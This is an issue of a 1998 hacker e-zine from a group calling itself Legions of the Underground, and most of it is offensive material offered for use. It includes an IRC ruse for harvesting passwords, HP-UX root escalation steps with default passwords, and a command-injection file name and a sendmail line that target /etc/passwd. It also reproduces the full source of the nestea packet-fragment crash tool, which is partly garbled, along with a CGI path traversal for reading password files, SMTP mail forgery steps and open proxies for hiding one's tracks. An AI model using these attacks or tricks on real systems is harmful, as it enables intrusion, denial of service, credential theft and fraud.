=========================================================================== *-* L e g i o n s *-* o f t h e U n d e r g r o u n d h t t p : w w w . l e g i o n s . o r g (K e e n_V e r a c i t y) *-* *-* =========================================================================== C o n t e n t: /Z1#P10.01/ o-NEWS-o *About | |- optiklenz *------------------------ | |- *------------------------ | |- *Beach Con - | |- sync *------------------------ | |- *Phreak Zine | |- optiklenz *------------------------ | |- *This Months Linkage - | |- LegionPhreak *------------------------ | |- o-IRC-o *Irc Social Engineering |*revisited|- optiklenz *------------------------ | |- *Legions Script - | BitchX |- HyperLogik *------------------------ | |- o-Neophytes-o *Basic Unix Commands - | |- optiklenz *------------------------ | |- *Exploits? | |- miah *------------------------ | |- o-Security-o *HPUX Security Overview | revised |- tip *------------------------ | |- *HPUX Exploits Note | bugs |- optiklenz *------------------------ | |- *Nesta Exploit | advisory |- dallion *------------------------ | |- *Infoseek | exploit |- optiklenz *------------------------ | |- *Fake Mail | revised |- optiklenz *------------------------ | |- *Wingate Exertion | |- optiklenz *------------------------ | |- *backdoor.c | |- jsbach *------------------------ | |- *Ip Spoofing | |- optiklenz *------------------------ | |- *Anal Sniff | |- chronic *------------------------ | |- *Back Attack | |- chrak *------------------------ | |- *Irix LMR | |- optiklenz *------------------------ | |- *Securing Linux | |- BlackIC *------------------------ | |- *FoolProof | |- Duncan Silver *------------------------ | |- o-Misc-o *pnp56K Linux Setup | |- mosoka *------------------------ | |- *Sniffer Log | |- chrak *------------------------ | |- o-Comic Relief-o *------------------------ | |- *Young Hackers, and Jail | |- Ana1yzer *------------------------ | |- __________________________________________________________________ - { = - = N E W S = - = } - [ABOUT]-------------------------------------| optiklenz | This zine covers different aspects of computing. This months security focus is concentrated on the hpux platform. This month's guest editor is Analyzer. Guest editors along with the topic the editor is writing on will change monthly. Most of our articles, and zines for the past 6 years have been distributed through bulletin board services. Our own Electronic Source, and Abyss BBS just to name a couple. This is actually our first zine release being distro'd via the web. We release a new zine every month. If you would like to submit an article for the next zine send email to webmaster@legions.org with the subject matter of the article. Also if there is a cetain subject you'd like to see written about in the next zine please let us know. (1)------------NEWS-------------------------------------(1) [Beach Con]-------------------------------------| sync | Last year's Legion Con's (cyber con) theme was network utilization this year there will be a multiude of themes which range from main stream security, cryptology, to telephony, and other types of electronic manipulation. (2------------NEWS-------------------------------------(2) [Phreak Zine]-------------------------------------| optiklenz | We are currently working on our Phreak zine. There is progess, but production is going extremely slow being that members are currently occupied with their own activitys. An example of some of the zines content is listed below. [o] Shadowing your ANI [o] Detailing, and using a beige box.. [o] ATT-CONF [o] Phone Tapping [o] Discreet frequencies [o] Telenet #'s [o] More... Wan't to submit an article? Mail webmaster@leigons.org with the article title first. We will either "ok" it or decline it depending on your article content or if someone has already choosen the same subject matter. (3)------------NEWS-------------------------------------(3) [Linkage]-------------------------------------| LegionPhreak | This Months Linkage: They Finally have a static layout A UDDF.NET production (www.uddf.net) http://www.hackers.com http://www.hackedsites.com Exploits Galore Beat your Meat (It's good for you) http://www.rootshell.com http://www.freshmeat.net Rhino9 Unix Guru http://www.rhino9.com http://www.ugu.com/ Link of the month: www.legions.org (4)------------NEWS-------------------------------------(4) - { = - = I R C = - = } - [Social Engineering]-------------------------------------| optiklenz | Gaining Users passwords via irc Method1. First you need to open 2 irc clients open. This method is more authenic if you have operator status in the channel. On one of the open clients name yourself Bot, or something to that effect, and on the other client user your regular nick. If someone is looking to get op's let them know that there is a Bot in the channel, and if the user/users wan't ops they must first identify themselves with the Bot using the /msg Bot identify password command. After you tell them this and leave the room either way the passwd's will come rolling in. It's less suspicious if you leave though because people will think damage can't be done if your not there to do it on the antithesis you are still there because you are the Bot just sitting there collecting passwd's these passwd's maybe for their email account, website, and other things. So go back later and ask the people that fell for it if they have a website, or for their email address, etc, etc (5)------------IRC--------------------------------------(5) [Legions Script]-------------------------------------| Hyperlogik | Legions script for linux is due out in a few weeks. more info will be posted in the next zine. (6)------------IRC--------------------------------------(6) - { = - = N E O P H Y T E S = - = } - Note: The content of the neophytes section will grow more indepth every month. Escalating from basic to median, and so on... [Basic Unix Commands]-------------------------------------| optiklenz | who is on shows who is logged on the system write name name equiv to the person you want to chat with (ctrl D exits Chat mode EOT End of Transfer du -a mem check ps -pid user kills a user passwd Change your users passwd ls List all files in a directory (ls-a) telnet start a telnet session open open a location ftp start file transfer session find Find a file cd\dir dir being sub-directory netstat See current processes running among your connection. chgrp Changes a file's group ownership cat "file" type contents try cat /etc/passwd tcpdump Packet sniffer, moniter packets in promniscious mode rmdir Deletes one or more directories sleep Causes a process to become inactive for a specified amount of time sort Sort and merge one or more files spell Finds spelling errors in a file split Divides a file stty Displays or set terminal parameters tail Displays the end of a file troff Outputs formatted output to a typesetter tset Sets other terminal type unmask Allows the user to specify a new creation mask uucp Unix-to-Unix copy vi Full screen editor wc Displays details in the file size who Displays information on the system users write Used to send a message to another user ifconfig To see the routing layout/destination of packets etc gcc Compile C based code rm delete file mv rename bfs Scans a large file cal Displays a calendar mkdir Create a directory chmod Assign File permissions TIP: If you have temp access to a systen chmod 777 $home or chmod $email so you have access to their home directory, as well as their email later. (7)------------NEOPHYTES--------------------------------------(7) [Exploits]-------------------------------------| miah | Alot of people ask me about exploits, what they are, what they do, and how they use them. Well, I'm writing this document to explain this for hopefully my last time. It's just starting to bother me that I have to explain this everytime I'm on irc, so i thought there should be a text explaining them. Well, here it is. --- What is a ' Exploit ' ? --- Well to explain this simply, a Exploit is a program that 'exploits' a bug in a specific software. All exploits are different, they do different things exploit different bugs, thats why exploits are allways program specific. Exploits are made to get root on different operating systems. They achive this by exploiting a bug in software when the software is running as root. In UNIX type OS's, software may have to run as root ( or UID 0 ) in order to perform a specific task that cannot be performed as another user. So basically the exploit crashes the software while running as root to give you the beautiful root prompt. Well, now that I've answered questions one and two, I'm going to move on to question 3. --- How do I use a exploit? --- Since exploits are coded in C 99% of the time, you need a shell on the box you are going to use the exploit on, OR, you need to be running the same OS as the box you are attempting to hack. So basically, you need to put the source code, or the binary in your shell accounts dir, ( you want to use a hacked, or a shell not yours for this :) ) to put it on your shell, you can ftp to your account and upload it that way, or you can use rz if you are using a dialup shell. either way, i shouldnt have to explain those to things to much, its pretty easy. Once you have the exploit on the box you just need to compile it. Usually you would compile the exploit like so; blah:~/$gcc exploit.c that should compile your exploit. However, be aware that some exploit coders are sneaky pests, and like to pick on people who dont know C, so they will sometimes insert bugs into the exploit, thus uninabiling it to be compiled. So it does help to know C, when playing with C :) After the compiling is done, you should beable to just run the exploit and its work will be done when you see the root prompt. however, not all exploits are the same, and might require different commandlines to get them to work. --- Where can I get some exploits? --- Well 2 of the best places i have found for exploits are http://get.your.exploits.com and http://www.rootshell.com (8)------------NEOPHYTES--------------------------------------(8) - { = - = S E C U R I T Y= - = } - [Hpux Security Overview]-------------------------------------| tip | =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= HP-UX: A Security Overview, Part One revision02 17mar98 http://www.legions.org --------------------------------------------------------------------------- Table of Contents: 1) Intro and Disclaimer 5) The Trusted System 2) HP-UX: an Overview 6) Resources 3) The Setup by Default 7) Exploits 4) HP-UX Security Measures 8) To Be Continued --------------------------------------------------------------------------- 1) Intro and Disclaimer a) This text is designed to complement to general Unix knowledge. All Unix OS's are different in their own right. This text will delve into HP-UX- specific areas. This is not a Unix tutorial, rather a supplement to fundamental Unix hacking knowledge. b) This text will cover HP-UX version 10.x primarily. Specifically, 10.10 and 10.20 will be in mind. 11.0 has been released and I haven't gotten to checking it out yet. 9.x is old, and no longer supported by HP. Thus, the most logical choice (and most popular version of HP-UX) is 10.x. c) I'm not perfect; please notify me of any errors in the document. Also, if you see anything you want added to this file, feel free to send them to me. d) This text was written for educational purposes only. e) Thanks to HP, rootshell, and the various other hacker folks that have helped me write this article. Special thanks to Colonel Panic for find- ing many exploits, some of which I have used as examples. Shouts out to my fellow LoU members, the SOD, and the Chicago crew. --------------------------------------------------------------------------- 2) HP-UX: an Overview Largely based on SysV, Hewlett Packard's version of Unix, HP-UX, has un- dergone many changes and many version updates (current version is 11.0). While robust in many areas (ie, memory management, overall performance, etc), security leaves much to be desired. HP's vision of Unix seems to come from that of a closed network with non-malicious users (ie, /usr/local being world-writeable); only recently has the Internet been an explosion, and HP seems to be playing "catch up" to network and internal security. HP's solution to security problems have been patches. Lots of patches. You can see the patches on a system by typing "swlist -l product" (substitute "fileset" instead of "product" for more specific information. Patch and software information is stored in /var/adm/sw; so you can check out older pre-patched binaries there. As usual, system logs are kept in /var/adm (along with btmp, utmp, and wtmp). --------------------------------------------------------------------------- 3) The Setup by Default By default, HP-UX is VERY insecure. Yes, most Unixes are (by default), but HP-UX even more so. Here is a brief following of what is insecure by default: o /usr/local and subdirectories are world writeable. o Many applications by default are installed as world writeable (ie, measureware database module for oracle installs this way. o root's umask is set to: 02. o cue is installed (see section 6 for the exploit). o System is un-"Trusted." See section 4. o Direct login as root possible from all ttys (as result of being un- "Trusted"). o System logging is set pretty minimal (see /etc/syslog.conf); not that it matters, as system logging is pretty minimal no matter how you have it. o /etc/logingroup non-existent. While this is not an insecurity, it's worth mentioning. --------------------------------------------------------------------------- 4) HP-UX Security Measures o Suid scripts not possible This is a popular trend in newer Unix OS's. Basically, if you have a suid script, it will not be run as root. Binaries are what's important. o Dialup passwords You can set an additional password for a dialin device. If you dialed into an HP-UX server with dialup passwords enabled, you would enter your usual login and password, then an _additional_ dialup password. Each dialup password is dependant of the shell; the shell is used as the "login" field. To explain further, look at /etc/d_passwd: /bin/sh:qKrbuYLg9B2vU:0:0::: /bin/csh:4LcBNqYbmdp3Y:0:0::: /bin/ksh:zKanqUcdEzh3Q:0:0::: What's important here are the first two fields (obviously). Two other things to note; Firstly, if the system is relatively secure, the "login" field can only be eight characters long. This creates a problem if your shell is "/usr/local/bin/tcsh" (19 chars). Thus, what's done is either: a link is created that is less than eight characters (ie, /bin/tsh -> /usr /local/bin/tcsh) or dialup passwords just aren't used. Secondly, the file to reference which tty the dialin is located is /etc/dialups: /dev/ttyd0p7 That's it. That's the format of the file. o lanscan and ioscan Just a side note to the standard commands, ifconfig and netstat. lanscan will tell you what interface cards you have on the system, which are up or down, etc, etc. ioscan is similar, but covers the entire system, ie, hard drives, I/O adapters, memory, etc. Might be useful in getting more intimate with your system. --------------------------------------------------------------------------- 5) The Trusted System What is a "Trusted System"? Check for a /tcb directory. The existence of a /tcb directory signifies that the system you're on is a "Trusted System." The conversion to this is done through /usr/sbin/sam by root. Here is what converting does to a system: o Pseudo-shadow password scheme (actually uses a "protected password database"). o A stricter password authentication system. o User auditing. o Access control lists (acls) [note: only supported under hfs, not vxfs] [second note: being phased out]. o Terminal and time-based access control. Basically to put this all together, in the /tcb/files/auth directory, there are a number of subdirectories by capital and lowercase letters, ie, "e," "T," and so forth. This is the initial of the login. In that directory is a file per user. Thus, root's file would be /tcb/files/auth/r/root. What's in this file? It's basically like a password entry, with more fields. ie, /tcb/files/auth/r/root: root:u_name=root:u_id#0:\ :u_pwd=Z1Po84UVyBbGE:\ :u_bootauth:u_auditid#0:\ :u_auditflag#1:\ :u_pswduser=root:u_suclog#8895646615:u_lock@:chkent root's entry in /etc/passwd would then be: root:*:0:3:root:/:/sbin If it isn't obvious, the login and user id of an /etc/passwd are there, along with additional information. The above example has only a few fields listed. The full contents of an HP-UX password database file would contain: a login and user id b encrypted password c account owner d single user mode boot flag e audit id and audit flag f minimum time between password change (not in example - u_minchg) g password max length h password expiration time (not in example - u_maxlen) (not in example - u_exp) i password lifetime j time of last password change (not in example - u_life) (not in example - u_usucchg & u_unsucchg) k absolute password expiration date l max time allowed between logins (not in example - u_acct_expire) (not in example - u_max_llogin) m max days before expiration when before acct is locked warning will appear n user or system generated password? (not in example - u_pw_expire_ (not in example - u_pickpw) warning) o type of sys-ten passwords p triviality check on user-gen (not in example - u_genpwd) (not in example - u_restrict) q can pick null password? r userid of last person who changed (not in example - u_nullpw) this password (not in example - u_pwchanger) s random # that user must supply t can user generate random # for a (given to him by the admin) when password? (not in example - password is reset (not in example u_genchars) - u_pwd_admin_num) u can user generate random letters v time of day when user can login for a password? (not in example (not in example - u_tod) - u_genletters) w time of last successful login x time of last unsuccessful login (not in example - u_suclog) (not in example - u_unsuclog) y term or remote hosts from last z number of unsuccessful logins, this successful and unsuccessful logins # clears upon a successful login (not in example - u_suctty & (not in example - u_numunsuclog) u_unsuctty) 1 max number of login attempts 2 account locked flag (not in example before account is locked - u_lock) (not in example - u_maxtries) In /tcb/files, in addition to auth, there are two files, devassign and ttys. devassign contains device access info and ttys contains term access info. Here are a few lines from devassign: console:v_devs=/dev/console:v_type=terminal:chkent: ttyp0:v_devs=/dev/ttyp0:v_type=terminal:chkent: ttyp1:v_devs=/dev/ttyp1:v_type=terminal:chkent: The format of this file contains: a device name b aliases to that device c device supported (ie, printer, d users permitted on that device, if terminal, tape, or remote) not specified, all users may use it Here are a few lines from ttys: console:t_devname=console:t_maxtries#777:chkent: tty:t_devname=tty:chkent: tty00:t_devname=tty00:chkent: The above example only has a few fields listed. The full format of this file contains: a device name b last user (id) to log into that tty (not in example - t_uid) c last successful login time d last unsuccessful login time (not in example - t_logtime) (not in example - t_unsuctime) e number of consecutive logins f terminal lock flag before tty is locked In all actuality, not many HP-UX systems are setup to be Trusted. Managing a password database and tweaking is more work than neccessary. In addition, remote commands are not possible on a Trusted System, unless it is done _from_ a Trusted System. Lastly, mapping files to sync /etc /passwd with /tcb/files/auth are contained in /tcb/files/auth/system. These are called pw_id_map, gr_id_map, and aid_id_map. It is very likely that these mapping files will get out of sync with the database files. The solution is removing them and letting them regenerate. However, all in all, having a Trusted System can prove to take as much maintanence as an un- Trusted System. It's really the admin's call. I've seen maybe about half and half these days. --------------------------------------------------------------------------- 6) Resources o If you have a question about a patch, check out ftp://us-support. external.hp.com. All the current patches are available there for your peruseal. o http://www.rootshell.com, http://get.your.exploits.org, http://www.hha. net/hha/exploits, http://www.dhp.com/~fyodor/sploits_hpux.html: Very good sites with Unix and HP-UX-specific exploits. Both explanations and source code/scripts are available here. o Usenet: comp.os.security.announce and comp.sys.hp.hpux: Sometimes regular updates of weaknesses. Avoid alt.2600 at all costs. o And of course, the ever-so-handy man command. --------------------------------------------------------------------------- 7) Exploits These are only a few of many. I only added a few, as I wanted to explain about HP-UX security in general. Part 2 will delve deeper into exploits (as well as auditing, system calls, and acls). o cue bug The first thing after gaining access to an HP-UX system is to check if cue exists (typically in /usr/bin/cue). Make sure it's an suid binary (which it is by default). Simply set your umask to 000. Now start cue. In your home directory, do an ll. You'll see that the name of the file created by cue (in my case, it's called "IDMERROR.ttyp1") is owned by root. You'll also see that the umask follows and is world-writeable. Now exit cue. Remove the *ERROR* file created by cue. Think of a file like /etc/passwd or /.rhosts. Do an "ln -s /etc/passwd ~/IDMERROR.ttyp1" (or whatever suits your needs). Now start cue again. Exit it. You'll see that the root owned file that wasn't writeable by anyone not only is now truncated, but it has world write permission. Do whatever you want with it. o ftp mget bug This won't do you much good if ftp isn't suid root (most likely it won't be), but this still works (not as root though). In /tmp, create a separate directory (we'll use "test"). cd to that directory and execute this command: echo "date > /tmp/BLAH" > "|sh". Notice that /tmp/BLAH does not exist. Now, ftp to localhost. cd to /tmp/test and do a "mget *". ftp that file. Now quit ftp and check for a /tmp/BLAH. It exists! cat it. Now what if ftp was suid root, and the echo command you used to create "|sh" was this: echo "chmod 777 /etc/passwd" > "|sh"? o Old SAM bug Typically, when SAM (System Administration Manager) is being run by an admin, a temp file is created in /var/tmp. Newer, patched SAMs use arbitrary file names, ie OBAMDBAa01687 or aaaa01990, etc. But older SAMs used a consistent file name when writing this temp file. It was called: outdata. Since SAM is typically run as root, you'll see what I'm getting at here (duh, the temp file is owned by root). Simply create a link to a file, such as /etc/passwd to that temp file (ie, ln -s /etc/passwd /var /tmp/outdata). Now if root's umask is set to 000, then you'll own /etc /passwd next time the admin runs SAM. This trick is unlikely these days, as most SAMs are patched and most admins don't use umask 000 on root. o Old SAM bug 2 On older versions of SAM, a user named sam_exec was created with uid 0. The default password for this on 10.x is: x7vpa5jh Simply login as sam_exec, and hit control-c right away for a shell. o ppl bug Another symbolic link exploit. ppl's log file is: /var/ppl/log. Now, you can simply remove or move this (so that /var/ppl/log is non-existent; also /var/ppl is world-writeable on default, thus you can do this). This log file is owned by root (ppl is an suid program). Next, think of a file that you'd like to nuke and own (if you don't want to get caught, try /.rhosts instead of something like /etc/passwd; in addition, save the old /var/ppl/log somewhere to put back when you're done). Now do a: ln -s /.rhosts /var/ppl/log. Then type: ppl -o '\ + + ' or whatever you want to place in /.rhosts. You get the drift. Now you can remove /var/ppl/log and put the old one back in place. You can now rlogin as root. o Educational Centers HP's educational centers are protected mainly by firewalls. But if you happen to get in, the root password on nearly all machines is simply: hp. --------------------------------------------------------------------------- 8) To Be Continued Part Two will delve deeper into the Trusted System, specifically cover- ing auditing and acls. Exploits will also be covered in greater detail. --------------------------------------------------------------------------- (c) 1998 tip of Legions of the Underground http://www.legions.org =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= (10)------------SECURITY--------------------------------------(10) [Hpux Exploits Note]-------------------------------------| optiklenz | HP_UX versions 1.2&13.1 sm, -oQ ==> can read/write any file 5.57 from:<"|/bin/rm /etc/passwd"> && bounce mail.... HPUX <7.0 1-- chfn -- allows newlines, etc () HP-UX 1-- sendmail: mail directly to programs () HPUX A.09.01 1-- sendmail: mail directly to programs () 1) libXt: this is a widely known security hole that allows local users to gain root access via setuid X programs like xterm or xload. A recommendation is to replace the guilty libraries by applying X/Motif "jumbo" patches, which is a good thing anyway. 2) sendmail: yet another sendmail hole. The best solution at CERN is maybe to use the public domain version of sendmail (used by default on all HP-UX 10.20 systems) that does not seem vulnerable. (10)------------SECURITY--------------------------------------(10) [Nesta Exploit]-------------------------------------| Dallion | --------------------------------------------------------- Note: Nestea by humble\nCode ripped from teardrop by route --------------------------------------------------------- Bascially crashes a machine using "off by one" ip headers. Like boink and land reversed. Its a total rip (the code that is) but it works, non the less. I have tested it on machines running kernel 2.0.33 and 2.1.95 both machines went slamming down when I hit them, I like this toy :) To fix it: 1) if you do packet filtering set it to filter off by one ip headers 2) fix your kernel to not process these packets. -Dallion Dalson Here is the exploit: _ 01. nestea.c - exploits the "off by one ip header" bug in Linux // // nestea.c by humble of rhino9 4/16/98 // This exploits the "off by one ip header" bug in the linux ip frag code. // Crashes linux 2.0.* and 2.1.* and some windows boxes // this code is a total rip of teardrop - it's messy // hi sygma #include #include #include #include #include #include #include #include #include #include #include // bsd usage is currently broken because of socket options on the third sendto #ifdef STRANGE_BSD_BYTE_ORDERING_THING /* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */ #define FIX(n) (n) #else /* OpenBSD 2.1, all Linux */ #define FIX(n) htons(n) #endif /* STRANGE_BSD_BYTE_ORDERING_THING */ #define IP_MF 0x2000 /* More IP fragment en route */ #define IPH 0x14 /* IP header size */ #define UDPH 0x8 /* UDP header size */ #define MAGIC2 108 #define PADDING 256 /* datagram frame padding for first packet */ #define COUNT 500 /* we are overwriting a small number of bytes we shouldnt have access to in the kernel. to be safe, we should hit them till they die :> */ void usage(u_char *); u_long name_resolve(u_char *); u_short in_cksum(u_short *, int); void send_frags(int, u_long, u_long, u_short, u_short); int main(int argc, char **argv) { int one = 1, count = 0, i, rip_sock; u_long src_ip = 0, dst_ip = 0; u_short src_prt = 0, dst_prt = 0; struct in_addr addr; if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("raw socket"); exit(1); } if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one)) < 0) { perror("IP_HDRINCL"); exit(1); } if (argc < 3) usage(argv[0]); if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2]))) { fprintf(stderr, "What the hell kind of IP address is that?\n"); exit(1); } while ((i = getopt(argc, argv, "s:t:n:")) != EOF) { switch (i) { case 's': /* source port (should be emphemeral) */ src_prt = (u_short)atoi(optarg); break; case 't': /* dest port (DNS, anyone?) */ dst_prt = (u_short)atoi(optarg); break; case 'n': /* number to send */ count = atoi(optarg); break; default : usage(argv[0]); break; /* NOTREACHED */ } } srandom((unsigned)(time((time_t)0))); if (!src_prt) src_prt = (random() % 0xffff); if (!dst_prt) dst_prt = (random() % 0xffff); if (!count) count = COUNT; fprintf(stderr, "Nestea by humble\nCode ripped from teardrop by route / daemon9\n"); fprintf(stderr, "Death on flaxen wings (yet again):\n"); addr.s_addr = src_ip; fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt); addr.s_addr = dst_ip; fprintf(stderr, " To: %15s.%5d\n", inet_ntoa(addr), dst_prt); fprintf(stderr, " Amt: %5d\n", count); fprintf(stderr, "[ "); for (i = 0; i < count; i++) { send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt); fprintf(stderr, "b00m "); usleep(500); } fprintf(stderr, "]\n"); return (0); } void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt, u_short dst_prt) { int i; u_char *packet = NULL, *p_ptr = NULL; /* packet pointers */ u_char byte; /* a byte */ struct sockaddr_in sin; /* socket protocol structure */ sin.sin_family = AF_INET; sin.sin_port = src_prt; sin.sin_addr.s_addr = dst_ip; packet = (u_char *)malloc(IPH + UDPH + PADDING+40); p_ptr = packet; bzero((u_char *)p_ptr, IPH + UDPH + PADDING); byte = 0x45; /* IP version and header length */ memcpy(p_ptr, &byte, sizeof(u_char)); p_ptr += 2; /* IP TOS (skipped) */ *((u_short *)p_ptr) = FIX(IPH + UDPH + 10); /* total length */ p_ptr += 2; *((u_short *)p_ptr) = htons(242); /* IP id */ p_ptr += 2; *((u_short *)p_ptr) |= FIX(IP_MF); /* IP frag flags and offset */ p_ptr += 2; *((u_short *)p_ptr) = 0x40; /* IP TTL */ byte = IPPROTO_UDP; memcpy(p_ptr + 1, &byte, sizeof(u_char)); p_ptr += 4; /* IP checksum filled in by kernel */ *((u_long *)p_ptr) = src_ip; /* IP source address */ p_ptr += 4; *((u_long *)p_ptr) = dst_ip; /* IP destination address */ p_ptr += 4; *((u_short *)p_ptr) = htons(src_prt); /* UDP source port */ p_ptr += 2; *((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */ p_ptr += 2; *((u_short *)p_ptr) = htons(8 + 10); /* UDP total length */ if (sendto(sock, packet, IPH + UDPH + 10, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) == -1) { perror("\nsendto"); free(packet); exit(1); } p_ptr = packet; bzero((u_char *)p_ptr, IPH + UDPH + PADDING); byte = 0x45; /* IP version and header length */ memcpy(p_ptr, &byte, sizeof(u_char)); p_ptr += 2; /* IP TOS (skipped) */ *((u_short *)p_ptr) = FIX(IPH + UDPH + MAGIC2); /* total length */ p_ptr += 2; *((u_short *)p_ptr) = htons(242); /* IP id */ p_ptr += 2; *((u_short *)p_ptr) = FIX(6); /* IP frag flags and offset */ p_ptr += 2; *((u_short *)p_ptr) = 0x40; /* IP TTL */ byte = IPPROTO_UDP; memcpy(p_ptr + 1, &byte, sizeof(u_char)); p_ptr += 4; /* IP checksum filled in by kernel */ *((u_long *)p_ptr) = src_ip; /* IP source address */ p_ptr += 4; *((u_long *)p_ptr) = dst_ip; /* IP destination address */ p_ptr += 4; *((u_short *)p_ptr) = htons(src_prt); /* UDP source port */ p_ptr += 2; *((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */ p_ptr += 2; *((u_short *)p_ptr) = htons(8 + MAGIC2); /* UDP total length */ if (sendto(sock, packet, IPH + UDPH + MAGIC2, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) == -1) { perror("\nsendto"); free(packet); exit(1); } p_ptr = packet; bzero((u_char *)p_ptr, IPH + UDPH + PADDING+40); byte = 0x4F; /* IP version and header length */ memcpy(p_ptr, &byte, sizeof(u_char)); p_ptr += 2; /* IP TOS (skipped) */ *((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING+40); /* total length */ p_ptr += 2; *((u_short *)p_ptr) = htons(242); /* IP id */ p_ptr += 2; *((u_short *)p_ptr) = 0 | FIX(IP_MF); /* IP frag flags and offset */ p_ptr += 2; *((u_short *)p_ptr) = 0x40; /* IP TTL */ byte = IPPROTO_UDP; memcpy(p_ptr + 1, &byte, sizeof(u_char)); p_ptr += 4; /* IP checksum filled in by kernel */ *((u_long *)p_ptr) = src_ip; /* IP source address */ p_ptr += 4; *((u_long *)p_ptr) = dst_ip; /* IP destination address */ p_ptr += 44; *((u_short *)p_ptr) = htons(src_prt); /* UDP source port */ p_ptr += 2; *((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */ p_ptr += 2; *((u_short *)p_ptr) = htons(8 + PADDING); /* UDP total length */ for(i=0;ih_addr, (char *)&addr.s_addr, host_ent->h_length); } return (addr.s_addr); } void usage(u_char *name) { fprintf(stderr, "%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\n", name); exit(0); } (11)------------SECURITY--------------------------------------(11) [Infoseek]-------------------------------------| optiklenz | http://www.infoseek.com/cgi/bin?/./view?/home/path alternate bin with etc (etc, etc), and you will receive /etc/ directory structure which contains the passwd file. The above exploits a discreet flaw in infoseeks cgi. It can be used to view various binary, and commands. If you are viewing it using a netscape browser keep reloading the document output will change the binary data. If you are using lynx you should receive command binary, and a directory structure..... /bin/ For Example: imeOasetunameOäsleepOåstrchgOæstrconfOçsttyOèsuOétabsOêtailOëtalkOìtee OítelnetOîtftpOïticOþtimeOñtipOòtplotOótputOôtrOotrueOöttyO÷unameOøupt imeOùvacationOúvmstatOûwcOüwhichOywhoOþwhoisOwriteOxargsOxstrONbgONcd ONcommandO[dispgidOddispuidOzexONfcONfgONgetoptsONhashOi386Oi486Oi860O i86pcOiAPX286ONjobsONkillOhlnOm68kOmc68000Omc68010Omc68020Omc68030Omc6 8040OhmvOþpageOpdp11ONreadOyredO¥rkshOshOsparcOsunOsun2Osun3Osun3xOsun 4Osun4cOsun4dOsun4eOsun4mONtestOâtouchONtypeOu370Ou3bOu3b15Ou3b2Ou3b5O NulimitONumaskONunaliasOvaxOzveditOzviOzviewOøwONwaitOAyppasswdOdmesgO pcatOstraceOasaOawkObannerObatchO bcO bdiffObfsOcalO calendarOcolOcommOcompressOcsplitOdcOdiffOdiff3OdircmpOdos2unixOexpand OfactorOgraphOlastOlastcommOlognameOlookOmkfifoOnawkO OfactorOgraphOlas OlastcommOlognameOlookOmkfifoOnawkO newformO!newsO"nlO#packO$pasteO%rupO&rusersO'sdiffO(sortO)spellO*splin eO+splitO,sumO-tcopyO.unexpandO/uniqO0unitsO1unix2dosO2unpackO3uudecod eO4uuencodeO5vsigOoawkO uncompressOzcatO6volcheckO7audioconvertO8 admintoolO;showrevOchrtblO?colltblO@gencatOAgettxtOBkbdcompOClocaleODm kmsgsOEmontblOFmsgfmtOGprintfOHsrchtxtOIxgettextO>wchrtblOJaddbibOKapr oposOLcheckeqOMchecknrONdapsOOderoffOPdiffmkOQeqnORindxbibOSlookbibOTn eqnOUnroffOVreferOWroffbibOXsoelimOYsortbibOZtaO[tblO\troffO]ulO^vgrin dOKcatmanOKmanOKwhatisO_sagO`sarOaacctcomObtimexOcctOdcuOeuucpOfuuglis http://www.infoseek.com/cgi/etc?/./read_./log/view?/home/passwd in lynx will list the directory structure for the etc directory i;e /etc/ resolv.conf .. passwd notrouterHlogin.accessshellsIhosts.equivS defaultrouterTskeykeys" hostname.hme1 oshadowstmpP8opasswd(rdista005nY publickey;chrootmvdir?pwck@termcapAunlinkBrmmount.confC vold.confD.sysIDtool.stateE defaultdomainFnodenameG hostname.hme0.obp_devicesJinitpipe.old.35Wpath_to_inst.oldK.mnttab.loc If you use lynx you will be able to grab the .passwd file. (12)------------SECURITY--------------------------------------(12) [Mail Forge]-------------------------------------| optiklenz | I wrote about this years ago, and decided to revise. This exploits smtp (port numeric value 25) allowing you to forge email from a remote host. Unix/Linux Users Use: $ open url.host.net Windows Users Use: c:\windows\telnet <-- Enter url.host.net as the host to connect to, and 25 as the port. After connected: 220 url.host.net ESMTP Sendmail 8.8.5/SCO5 ready at Label, day month/day/year 3 -0400 (EDT) If it prompts with a "It's always polite to "helo" command mail rctp to user@domain.net | Varibles | next [ helo = call send] mail rcpt from fake@faked.net [ rcpt = recipient] [vrfy = verify ] vrfy comes in to process if things don't seem to be going right For verify it is good to know uid's of people who use the system your forging from. use: vrfy uid (user id) Then type "Data", and press enter The first thing you'll type in is a title. Next is the body msg. Both should be on seperate lines. once finished type --> a . <-- then type quit, and press enter. (13)------------SECURITY--------------------------------------(13) [Wingate]-------------------------------------| optiklenz | Short preface on wingating vault purposes. One is able to use an exploit in cetain systems to bounce from one host to another. A wingate can be used for system benifiet or system downfall. One way it can be used is as a firewall to protect from outside attacks on your host. Another use is bouncing from one host to another to cover your tracks. This will put the fault on the system you wingated from. Unix/Linux Usage: $ telnet wingate.net Windows Usage: Run a telnet client and connect to a wingate address via port 23 Once prompted with " Wingate: " you then enter the location you wan't to bounce to. If using the wingate method to test your systems logging it is good to bounce from more then 1 wingate at a time. Using Wingate as a socks host on IRC: Linux Use: /server :23 /quote :6667 Windows use: Enter wingate location in your irc client's "FIREWALL/SOCKS HOST" query. [Some Wingates For your Proxy Pleasure] ns2.thesocket.com formfill.com 207.96.173.116 207.96.173.109 207.96.173.119 207.96.173.144 (14)------------SECURITY--------------------------------------(14)